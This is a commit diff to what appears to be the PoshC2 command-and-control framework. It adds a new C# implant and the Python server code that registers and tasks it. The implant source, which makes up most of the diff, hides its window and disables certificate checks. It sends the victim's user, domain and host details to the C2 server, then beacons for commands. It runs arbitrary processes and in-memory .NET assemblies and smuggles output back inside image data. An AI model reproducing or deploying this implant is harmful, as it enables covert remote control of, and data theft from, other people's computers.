Added CSharp Implant/Dll/Shellcode - More functionality coming soon
parent
971ef58e83
commit
190cb33288
|
@ -2,7 +2,7 @@
|
||||||
|
|
||||||
from DB import *
|
from DB import *
|
||||||
from Config import *
|
from Config import *
|
||||||
import os
|
import os, base64
|
||||||
|
|
||||||
def check_module_loaded( module_name, randomuri, force=False ):
|
def check_module_loaded( module_name, randomuri, force=False ):
|
||||||
try:
|
try:
|
||||||
|
|
18
C2Server.py
18
C2Server.py
|
@ -125,8 +125,24 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
implant_type = "Daisy"
|
implant_type = "Daisy"
|
||||||
if s.path == ("%s?m" % new_implant_url):
|
if s.path == ("%s?m" % new_implant_url):
|
||||||
implant_type = "OSX"
|
implant_type = "OSX"
|
||||||
|
if s.path == ("%s?c" % new_implant_url):
|
||||||
|
implant_type = "C#"
|
||||||
|
|
||||||
if implant_type == "OSX":
|
if implant_type == "C#":
|
||||||
|
cookieVal = (s.cookieHeader).replace("SessionID=","")
|
||||||
|
decCookie = decrypt(KEY, cookieVal)
|
||||||
|
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])
|
||||||
|
Domain,User,Hostname,Arch,PID,Proxy = decCookie.split(";")
|
||||||
|
newImplant = Implant(IPAddress, implant_type, Domain.decode("utf-8"), User.decode("utf-8"), Hostname.decode("utf-8"), Arch, PID, Proxy)
|
||||||
|
newImplant.save()
|
||||||
|
newImplant.display()
|
||||||
|
responseVal = encrypt(KEY, newImplant.SharpCore)
|
||||||
|
s.send_response(200)
|
||||||
|
s.send_header("Content-type", "text/html")
|
||||||
|
s.end_headers()
|
||||||
|
s.wfile.write(responseVal)
|
||||||
|
|
||||||
|
elif implant_type == "OSX":
|
||||||
cookieVal = (s.cookieHeader).replace("SessionID=","")
|
cookieVal = (s.cookieHeader).replace("SessionID=","")
|
||||||
decCookie = decrypt(KEY, cookieVal)
|
decCookie = decrypt(KEY, cookieVal)
|
||||||
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])
|
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])
|
||||||
|
|
4
Core.py
4
Core.py
|
@ -38,6 +38,10 @@ def load_module(module_name):
|
||||||
file = codecs.open(("%sModules/%s" % (POSHDIR,module_name)), 'r', encoding='utf-8-sig')
|
file = codecs.open(("%sModules/%s" % (POSHDIR,module_name)), 'r', encoding='utf-8-sig')
|
||||||
return file.read()
|
return file.read()
|
||||||
|
|
||||||
|
def load_module_sharp(module_name):
|
||||||
|
file = open(("%sModules/%s" % (POSHDIR,module_name)), 'r+b')
|
||||||
|
return base64.b64encode(file.read())
|
||||||
|
|
||||||
def get_images():
|
def get_images():
|
||||||
dir_path = os.path.dirname(os.path.realpath(__file__))
|
dir_path = os.path.dirname(os.path.realpath(__file__))
|
||||||
rootimagedir = "%s/Images/" % dir_path
|
rootimagedir = "%s/Images/" % dir_path
|
||||||
|
|
|
@ -0,0 +1,506 @@
|
||||||
|
using System;
|
||||||
|
using System.Linq;
|
||||||
|
using System.Net;
|
||||||
|
using System.Text;
|
||||||
|
using System.Text.RegularExpressions;
|
||||||
|
using System.Reflection;
|
||||||
|
using System.Threading;
|
||||||
|
using System.Diagnostics;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.IO;
|
||||||
|
using System.IO.Compression;
|
||||||
|
|
||||||
|
//mono-csc /opt/PoshC2_Python_Git/Files/Sharp.cs -out:/tmp/Sharp.dll -target:library
|
||||||
|
//cat /tmp/Sharp.dll | base64 -w 0 | xclip
|
||||||
|
|
||||||
|
public class Program
|
||||||
|
{
|
||||||
|
[DllImport("kernel32.dll")]
|
||||||
|
static extern IntPtr GetConsoleWindow();
|
||||||
|
[DllImport("user32.dll")]
|
||||||
|
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
|
||||||
|
public const int SW_HIDE = 0;
|
||||||
|
public const int SW_SHOW = 5;
|
||||||
|
|
||||||
|
public static void Sharp()
|
||||||
|
{
|
||||||
|
var handle = GetConsoleWindow();
|
||||||
|
ShowWindow(handle, SW_HIDE);
|
||||||
|
AllowUntrustedCertificates();
|
||||||
|
try { primer(); } catch {}
|
||||||
|
Thread.Sleep(300000);
|
||||||
|
try { primer(); } catch { }
|
||||||
|
Thread.Sleep(600000);
|
||||||
|
try { primer(); } catch { }
|
||||||
|
}
|
||||||
|
|
||||||
|
public static void Main()
|
||||||
|
{
|
||||||
|
Sharp();
|
||||||
|
}
|
||||||
|
|
||||||
|
static byte[] Combine(byte[] first, byte[] second)
|
||||||
|
{
|
||||||
|
byte[] ret = new byte[first.Length + second.Length];
|
||||||
|
Buffer.BlockCopy(first, 0, ret, 0, first.Length);
|
||||||
|
Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
|
||||||
|
return ret;
|
||||||
|
}
|
||||||
|
|
||||||
|
static System.Net.WebClient GetWebRequest(string cookie)
|
||||||
|
{
|
||||||
|
var x = new System.Net.WebClient();
|
||||||
|
|
||||||
|
string purl = "#REPLACEPROXYURL#";
|
||||||
|
string puser = "#REPLACEPROXYUSER#";
|
||||||
|
string ppass = "#REPLACEPROXYPASSWORD#";
|
||||||
|
|
||||||
|
if (!String.IsNullOrEmpty(purl)) {
|
||||||
|
WebProxy proxy = new WebProxy();
|
||||||
|
proxy.Address = new Uri(purl);
|
||||||
|
proxy.Credentials = new NetworkCredential(puser, ppass);
|
||||||
|
proxy.UseDefaultCredentials = false;
|
||||||
|
proxy.BypassProxyOnLocal = false;
|
||||||
|
x.Proxy = proxy;
|
||||||
|
}
|
||||||
|
|
||||||
|
string df = "#REPLACEDF#";
|
||||||
|
if (!String.IsNullOrEmpty(df)) {
|
||||||
|
x.Headers.Add("Host",df);
|
||||||
|
}
|
||||||
|
|
||||||
|
x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
|
||||||
|
x.Headers.Add("Referer", "#REPLACEREFERER#");
|
||||||
|
|
||||||
|
if (cookie != null)
|
||||||
|
{
|
||||||
|
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
|
||||||
|
}
|
||||||
|
|
||||||
|
return x;
|
||||||
|
}
|
||||||
|
|
||||||
|
static string Decryption(string key, string enc)
|
||||||
|
{
|
||||||
|
var b = System.Convert.FromBase64String(enc);
|
||||||
|
Byte[] IV = new Byte[16];
|
||||||
|
Array.Copy(b, IV, 16);
|
||||||
|
try {
|
||||||
|
var a = CAMR(key, System.Convert.ToBase64String(IV));
|
||||||
|
var d = a.CreateDecryptor();
|
||||||
|
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
|
||||||
|
return System.Text.Encoding.UTF8.GetString(u);
|
||||||
|
} catch {
|
||||||
|
var a = CAMA(key, System.Convert.ToBase64String(IV));
|
||||||
|
var d = a.CreateDecryptor();
|
||||||
|
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
|
||||||
|
return System.Text.Encoding.UTF8.GetString(u);
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
static string Encryption(string key, string un, bool comp = false)
|
||||||
|
{
|
||||||
|
var b = System.Text.Encoding.UTF8.GetBytes(un);
|
||||||
|
byte[] byEnc = b;
|
||||||
|
if (comp){
|
||||||
|
byEnc = Compress(b);
|
||||||
|
}
|
||||||
|
try {
|
||||||
|
var a = CAMR(key, null);
|
||||||
|
var e = a.CreateEncryptor();
|
||||||
|
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
|
||||||
|
byte[] p = null;
|
||||||
|
p = Combine(a.IV, f);
|
||||||
|
return System.Convert.ToBase64String(p);
|
||||||
|
} catch {
|
||||||
|
var a = CAMA(key, null);
|
||||||
|
var e = a.CreateEncryptor();
|
||||||
|
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
|
||||||
|
byte[] p = null;
|
||||||
|
p = Combine(a.IV, f);
|
||||||
|
return System.Convert.ToBase64String(p);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV)
|
||||||
|
{
|
||||||
|
System.Security.Cryptography.AesCryptoServiceProvider b = new System.Security.Cryptography.AesCryptoServiceProvider();
|
||||||
|
b.Mode = System.Security.Cryptography.CipherMode.CBC;
|
||||||
|
b.Padding = System.Security.Cryptography.PaddingMode.Zeros;
|
||||||
|
b.BlockSize = 128;
|
||||||
|
b.KeySize = 256;
|
||||||
|
|
||||||
|
if (IV != null)
|
||||||
|
{
|
||||||
|
b.IV = System.Convert.FromBase64String(IV);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (key != null)
|
||||||
|
{
|
||||||
|
b.Key = System.Convert.FromBase64String(key);
|
||||||
|
}
|
||||||
|
|
||||||
|
return b;
|
||||||
|
}
|
||||||
|
|
||||||
|
static System.Security.Cryptography.RijndaelManaged CAMR(string key,string IV)
|
||||||
|
{
|
||||||
|
System.Security.Cryptography.RijndaelManaged a = new System.Security.Cryptography.RijndaelManaged();
|
||||||
|
a.Mode = System.Security.Cryptography.CipherMode.CBC;
|
||||||
|
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
|
||||||
|
a.BlockSize = 128;
|
||||||
|
a.KeySize = 256;
|
||||||
|
|
||||||
|
if (IV != null)
|
||||||
|
{
|
||||||
|
a.IV = System.Convert.FromBase64String(IV);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (key != null)
|
||||||
|
{
|
||||||
|
a.Key = System.Convert.FromBase64String(key);
|
||||||
|
}
|
||||||
|
|
||||||
|
return a;
|
||||||
|
}
|
||||||
|
|
||||||
|
static void AllowUntrustedCertificates()
|
||||||
|
{
|
||||||
|
try
|
||||||
|
{
|
||||||
|
System.Net.ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(delegate { return true; } );
|
||||||
|
}
|
||||||
|
catch { }
|
||||||
|
}
|
||||||
|
|
||||||
|
static void primer()
|
||||||
|
{
|
||||||
|
DateTime now = DateTime.Now;
|
||||||
|
DateTime killDate = Convert.ToDateTime("#REPLACEKILLDATE#");
|
||||||
|
if (killDate < now){
|
||||||
|
System.Environment.Exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
|
||||||
|
var dn = System.Environment.UserDomainName;
|
||||||
|
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
|
||||||
|
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
|
||||||
|
int pid = Process.GetCurrentProcess().Id;
|
||||||
|
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
|
||||||
|
string o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
|
||||||
|
string key = "#REPLACEKEY#";
|
||||||
|
var pp = Encryption(key, o);
|
||||||
|
string baseURL = "#REPLACEBASEURL#";
|
||||||
|
string s = "#REPLACESTARTURL#";
|
||||||
|
var primer = GetWebRequest(pp).DownloadString(s);
|
||||||
|
var x = Decryption(key, primer);
|
||||||
|
|
||||||
|
Regex re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
|
||||||
|
Match m = re.Match(x);
|
||||||
|
string RandomURI = m.Groups[1].ToString();
|
||||||
|
|
||||||
|
re = new Regex("URLS10484390243(.*)34209348401SLRU");
|
||||||
|
m = re.Match(x);
|
||||||
|
string URLS = m.Groups[1].ToString();
|
||||||
|
|
||||||
|
re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
|
||||||
|
m = re.Match(x);
|
||||||
|
var KillDate = m.Groups[1].ToString();
|
||||||
|
|
||||||
|
re = new Regex("SLEEP98001(.*)10089PEELS");
|
||||||
|
m = re.Match(x);
|
||||||
|
var Sleep = m.Groups[1].ToString();
|
||||||
|
|
||||||
|
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
|
||||||
|
m = re.Match(x);
|
||||||
|
var NewKey = m.Groups[1].ToString();
|
||||||
|
|
||||||
|
re = new Regex("IMGS19459394(.*)49395491SGMI");
|
||||||
|
m = re.Match(x);
|
||||||
|
var IMGs = m.Groups[1].ToString();
|
||||||
|
|
||||||
|
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
|
||||||
|
}
|
||||||
|
|
||||||
|
static byte[] Compress(byte[] raw)
|
||||||
|
{
|
||||||
|
using (MemoryStream memory = new MemoryStream())
|
||||||
|
{
|
||||||
|
using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true))
|
||||||
|
{
|
||||||
|
gzip.Write(raw, 0, raw.Length);
|
||||||
|
}
|
||||||
|
return memory.ToArray();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
static byte[] GetImgData(byte[] cmdoutput, string[] stringnewIMGS)
|
||||||
|
{
|
||||||
|
Random rnd = new Random();
|
||||||
|
string randimg = stringnewIMGS[rnd.Next(stringnewIMGS.Length)];
|
||||||
|
byte[] imgBytes = System.Convert.FromBase64String(randimg);
|
||||||
|
var maxByteslen = 1500;
|
||||||
|
var maxDatalen = 1500 + cmdoutput.Length;
|
||||||
|
var imageByteslen = imgBytes.Length;
|
||||||
|
var paddingByteslen = maxByteslen - imageByteslen;
|
||||||
|
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(paddingByteslen)));
|
||||||
|
|
||||||
|
var ImageBytesFull = new byte[maxDatalen];
|
||||||
|
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
|
||||||
|
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
|
||||||
|
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
|
||||||
|
return ImageBytesFull;
|
||||||
|
}
|
||||||
|
|
||||||
|
static Random random = new Random();
|
||||||
|
|
||||||
|
static string RandomString(int length)
|
||||||
|
{
|
||||||
|
const string chars = "...................@..........................Tyscf";
|
||||||
|
return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray());
|
||||||
|
}
|
||||||
|
|
||||||
|
static Type LoadSomething(string assemblyQualifiedName)
|
||||||
|
{
|
||||||
|
// Throws exception is type was not found
|
||||||
|
return Type.GetType(
|
||||||
|
assemblyQualifiedName,
|
||||||
|
(name) =>
|
||||||
|
{
|
||||||
|
// Returns the assembly of the type by enumerating loaded assemblies
|
||||||
|
// in the app domain
|
||||||
|
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
|
||||||
|
},
|
||||||
|
null,
|
||||||
|
true);
|
||||||
|
}
|
||||||
|
|
||||||
|
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
|
||||||
|
{
|
||||||
|
var re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+");
|
||||||
|
|
||||||
|
string strURLS = stringURLS.Replace(",","");
|
||||||
|
var stringnewURLS = re.Matches(strURLS).Cast<Match>().Select(m => m.Value).ToArray();
|
||||||
|
stringnewURLS = stringnewURLS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
|
||||||
|
|
||||||
|
string strIMGS = stringIMGS.Replace(",","");
|
||||||
|
var stringnewIMGS = re.Matches(strIMGS).Cast<Match>().Select(m => m.Value).ToArray();
|
||||||
|
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
|
||||||
|
|
||||||
|
int beacontime = 5;
|
||||||
|
|
||||||
|
if (!Int32.TryParse(Sleep, out beacontime))
|
||||||
|
{
|
||||||
|
beacontime = 5;
|
||||||
|
}
|
||||||
|
|
||||||
|
while(true)
|
||||||
|
{
|
||||||
|
Random rnd = new Random();
|
||||||
|
string URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
|
||||||
|
string G = (Guid.NewGuid()).ToString();
|
||||||
|
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
|
||||||
|
Thread.Sleep(beacontime*1000);
|
||||||
|
|
||||||
|
DateTime now = DateTime.Now;
|
||||||
|
DateTime killDate = Convert.ToDateTime(KillDate);
|
||||||
|
if (killDate < now){
|
||||||
|
System.Environment.Exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
var cmd = GetWebRequest(null).DownloadString(URL);
|
||||||
|
string output = "";
|
||||||
|
try {
|
||||||
|
string x = "";
|
||||||
|
try {
|
||||||
|
x = Decryption(Key, cmd);
|
||||||
|
x = x.Replace("\0", string.Empty);
|
||||||
|
} catch {}
|
||||||
|
using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\temp\log.txt", true))
|
||||||
|
{
|
||||||
|
file.WriteLine(x.ToString().TrimEnd());
|
||||||
|
}
|
||||||
|
if (x.ToLower().StartsWith("multicmd"))
|
||||||
|
{
|
||||||
|
string splitcmd = x.Replace("multicmd","");
|
||||||
|
string[] split = splitcmd.Split(new string[] {"!d-3dion@LD!-d"}, StringSplitOptions.RemoveEmptyEntries);
|
||||||
|
foreach (string c in split)
|
||||||
|
{
|
||||||
|
output = "";
|
||||||
|
//add download-file
|
||||||
|
//add upload-file
|
||||||
|
//add implant-core features, screenshot, tasklist, etc
|
||||||
|
|
||||||
|
if (c.ToLower() == "pwd") {
|
||||||
|
output = Directory.GetCurrentDirectory();
|
||||||
|
}
|
||||||
|
|
||||||
|
if (c.ToLower().StartsWith("dir") || c.ToLower().StartsWith("ls")){
|
||||||
|
string dirPath = "";
|
||||||
|
var stringOutput = new StringWriter();
|
||||||
|
Console.SetOut(stringOutput);
|
||||||
|
if (c.ToLower() == "dir" || c.ToLower() == "ls") {
|
||||||
|
dirPath = Directory.GetCurrentDirectory();
|
||||||
|
} else {
|
||||||
|
dirPath = Regex.Replace(c, "dir ", "", RegexOptions.IgnoreCase);
|
||||||
|
dirPath = Regex.Replace(c, "ls ", "", RegexOptions.IgnoreCase);
|
||||||
|
}
|
||||||
|
Console.WriteLine("Directory listing: {0} \r\n", dirPath);
|
||||||
|
string[] folderPaths = Directory.GetDirectories(dirPath, "*", SearchOption.TopDirectoryOnly);
|
||||||
|
foreach (var f in folderPaths)
|
||||||
|
{
|
||||||
|
try {
|
||||||
|
Console.WriteLine("d----- {0}", f.Normalize());
|
||||||
|
}
|
||||||
|
catch {}
|
||||||
|
}
|
||||||
|
string[] filePaths = Directory.GetFiles(dirPath, "*", SearchOption.TopDirectoryOnly);
|
||||||
|
foreach (var f in filePaths)
|
||||||
|
{
|
||||||
|
try {
|
||||||
|
Console.WriteLine("------ {0}", f.Normalize());
|
||||||
|
}
|
||||||
|
catch {}
|
||||||
|
}
|
||||||
|
output = stringOutput.ToString();
|
||||||
|
}
|
||||||
|
|
||||||
|
// load and execute assembly in current app domain
|
||||||
|
if (c.ToLower().StartsWith("loadmodule")){
|
||||||
|
//var stringOutput = new StringWriter();
|
||||||
|
//Console.SetOut(stringOutput);
|
||||||
|
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
|
||||||
|
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
|
||||||
|
//var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
|
||||||
|
//output = stringOutput.ToString();
|
||||||
|
}
|
||||||
|
|
||||||
|
// list loaded assemblies
|
||||||
|
if (c.ToLower().StartsWith("listmodules")){
|
||||||
|
var appd = AppDomain.CurrentDomain.GetAssemblies();
|
||||||
|
foreach (var ass in appd)
|
||||||
|
{
|
||||||
|
output += ass.FullName.ToString() + "\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (c.ToLower() == "ps"){
|
||||||
|
var loadedType = LoadSomething("ProcHandler, Get-ProcessList, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null");
|
||||||
|
var xxx = loadedType.Assembly.GetType("ProcHandler").InvokeMember("GetProcesses", BindingFlags.InvokeMethod, null, null, null);
|
||||||
|
output = xxx.ToString();
|
||||||
|
}
|
||||||
|
|
||||||
|
// run loaded assemblies
|
||||||
|
if (c.ToLower().StartsWith("run-assembly")){
|
||||||
|
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
|
||||||
|
string qualifiedname = splitargs[1];
|
||||||
|
string name = splitargs[2];
|
||||||
|
string method = splitargs[3];
|
||||||
|
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
|
||||||
|
foreach (var Ass in AppDomainAss)
|
||||||
|
{
|
||||||
|
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
|
||||||
|
{
|
||||||
|
var stringOutput = new StringWriter();
|
||||||
|
Console.SetOut(stringOutput);
|
||||||
|
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
|
||||||
|
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.InvokeMethod, null, null, null);
|
||||||
|
output = stringOutput.ToString();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// try to load another app domain and unload each time
|
||||||
|
if (c.ToLower().StartsWith("loadmodule-appdomain")){
|
||||||
|
var stringOutput = new StringWriter();
|
||||||
|
Console.SetOut(stringOutput);
|
||||||
|
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
|
||||||
|
AppDomain dom = AppDomain.CreateDomain("RANDOM");
|
||||||
|
Assembly assembly = dom.Load(System.Convert.FromBase64String(module));
|
||||||
|
var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
|
||||||
|
output = stringOutput.ToString();
|
||||||
|
AppDomain.Unload(dom);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (c.ToLower().StartsWith("exit")){
|
||||||
|
System.Environment.Exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (c.ToLower().StartsWith("start-process")){
|
||||||
|
string proc = c.Replace("'", "");
|
||||||
|
proc = proc.Replace("\"", "");
|
||||||
|
string pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
|
||||||
|
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
|
||||||
|
string args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
|
||||||
|
Process p = new Process();
|
||||||
|
p.StartInfo.UseShellExecute = false;
|
||||||
|
p.StartInfo.RedirectStandardOutput = true;
|
||||||
|
p.StartInfo.RedirectStandardError = true;
|
||||||
|
p.StartInfo.CreateNoWindow = true;
|
||||||
|
p.StartInfo.FileName = pstart;
|
||||||
|
p.StartInfo.Arguments = args;
|
||||||
|
p.Start();
|
||||||
|
output = p.StandardOutput.ReadToEnd();
|
||||||
|
output = output + p.StandardError.ReadToEnd();
|
||||||
|
p.WaitForExit();
|
||||||
|
}
|
||||||
|
|
||||||
|
if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) {
|
||||||
|
string beacon = Regex.Replace(c, "setbeacon ", "", RegexOptions.IgnoreCase);
|
||||||
|
beacon = Regex.Replace(beacon, "beacon ", "", RegexOptions.IgnoreCase);
|
||||||
|
if (beacon.ToLower().Contains("s"))
|
||||||
|
{
|
||||||
|
beacon = Regex.Replace(beacon, "s", "", RegexOptions.IgnoreCase);
|
||||||
|
if (!Int32.TryParse(beacon, out beacontime))
|
||||||
|
{
|
||||||
|
beacontime = 5;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else if (beacon.ToLower().Contains("m"))
|
||||||
|
{
|
||||||
|
beacon = Regex.Replace(beacon, "m", "", RegexOptions.IgnoreCase);
|
||||||
|
if (!Int32.TryParse(beacon, out beacontime))
|
||||||
|
{
|
||||||
|
beacontime = 5;
|
||||||
|
}
|
||||||
|
beacontime = beacontime * 60;
|
||||||
|
}
|
||||||
|
else if (beacon.ToLower().Contains("h"))
|
||||||
|
{
|
||||||
|
beacon = Regex.Replace(beacon, "h", "", RegexOptions.IgnoreCase);
|
||||||
|
if (!Int32.TryParse(beacon, out beacontime))
|
||||||
|
{
|
||||||
|
beacontime = 5;
|
||||||
|
}
|
||||||
|
beacontime = beacontime * 60;
|
||||||
|
beacontime = beacontime * 60;
|
||||||
|
}
|
||||||
|
else if (!Int32.TryParse(beacon, out beacontime))
|
||||||
|
{
|
||||||
|
beacontime = 5;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
|
||||||
|
G = (Guid.NewGuid()).ToString();
|
||||||
|
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
|
||||||
|
string task = Encryption(Key, c);
|
||||||
|
string coutput = Encryption(Key, output, true);
|
||||||
|
byte[] outputBytes = System.Convert.FromBase64String(coutput);
|
||||||
|
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
|
||||||
|
GetWebRequest(task).UploadData(URL, sendBytes);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
} catch (Exception e) {
|
||||||
|
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
|
||||||
|
URL = baseURL+"/"+URL+RandomURI;
|
||||||
|
string task = Encryption(Key, "Error");
|
||||||
|
string eroutput = Encryption(Key, "Error: " + output + e, true);
|
||||||
|
byte[] outputBytes = System.Convert.FromBase64String(eroutput);
|
||||||
|
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
|
||||||
|
GetWebRequest(task).UploadData(URL, sendBytes);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
30
Help.py
30
Help.py
|
@ -1,12 +1,12 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
|
|
||||||
logopic = """ __________ .__. _________ ________
|
logopic = """ __________ .__. _________ ________
|
||||||
\_______ \____ _____| |__ \_ ___ \ \_____ \
|
\_______ \____ _____| |__ \_ ___ \ \_____ \\
|
||||||
| ___/ _ \/ ___/ | \ / \ \/ / ____/
|
| ___/ _ \/ ___/ | \ / \ \/ / ____/
|
||||||
| | ( <_> )___ \| Y \ \ \____/ \
|
| | ( <_> )___ \| Y \ \ \____/ \\
|
||||||
|____| \____/____ >___| / \______ /\_______ \
|
|____| \____/____ >___| / \______ /\_______ \\
|
||||||
\/ \/ \/ \/
|
\/ \/ \/ \/
|
||||||
=============== v4.5 www.PoshC2.co.uk ============="""
|
=============== v4.6 www.PoshC2.co.uk ============="""
|
||||||
|
|
||||||
|
|
||||||
py_help1 = """
|
py_help1 = """
|
||||||
|
@ -34,6 +34,26 @@ searchhelp mimikatz
|
||||||
back
|
back
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
sharp_help1 = """
|
||||||
|
Implant Features:
|
||||||
|
=====================
|
||||||
|
ps
|
||||||
|
beacon 60s / beacon 10m / beacon 2h
|
||||||
|
ls/dir c:\\temp\\
|
||||||
|
pwd
|
||||||
|
loadmodule
|
||||||
|
loadmoduleforce
|
||||||
|
listmodule
|
||||||
|
run-assembly ProcHandler Get-ProcessList GetProcesses
|
||||||
|
start-process net -argumentlist users
|
||||||
|
kill-implant
|
||||||
|
hide-implant
|
||||||
|
unhide-implant
|
||||||
|
help
|
||||||
|
searchhelp listmodules
|
||||||
|
back
|
||||||
|
"""
|
||||||
|
|
||||||
posh_help1 = """
|
posh_help1 = """
|
||||||
Implant Features:
|
Implant Features:
|
||||||
=====================
|
=====================
|
||||||
|
@ -366,3 +386,5 @@ COMMANDS += ['invoke-psexecproxypayload','invoke-wmiproxypayload', 'invoke-dcomp
|
||||||
COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload']
|
COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload']
|
||||||
|
|
||||||
UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]
|
UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]
|
||||||
|
|
||||||
|
SHARPCOMMANDS = ["unhide-implant","ls","pwd","dir","start-process", "hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]
|
||||||
|
|
|
@ -31,6 +31,13 @@ class Implant(object):
|
||||||
self.ServerURL = new_serverurl = select_item("HostnameIP", "C2Server")
|
self.ServerURL = new_serverurl = select_item("HostnameIP", "C2Server")
|
||||||
self.AllBeaconURLs = get_otherbeaconurls()
|
self.AllBeaconURLs = get_otherbeaconurls()
|
||||||
self.AllBeaconImages = get_images()
|
self.AllBeaconImages = get_images()
|
||||||
|
self.SharpCore = """
|
||||||
|
RANDOMURI19901%s10991IRUMODNAR
|
||||||
|
URLS10484390243%s34209348401SLRU
|
||||||
|
KILLDATE1665%s5661ETADLLIK
|
||||||
|
SLEEP98001%s10089PEELS
|
||||||
|
NEWKEY8839394%s4939388YEKWEN
|
||||||
|
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages)
|
||||||
with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f:
|
with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f:
|
||||||
self.PythonImplant = base64.b64encode(f.read())
|
self.PythonImplant = base64.b64encode(f.read())
|
||||||
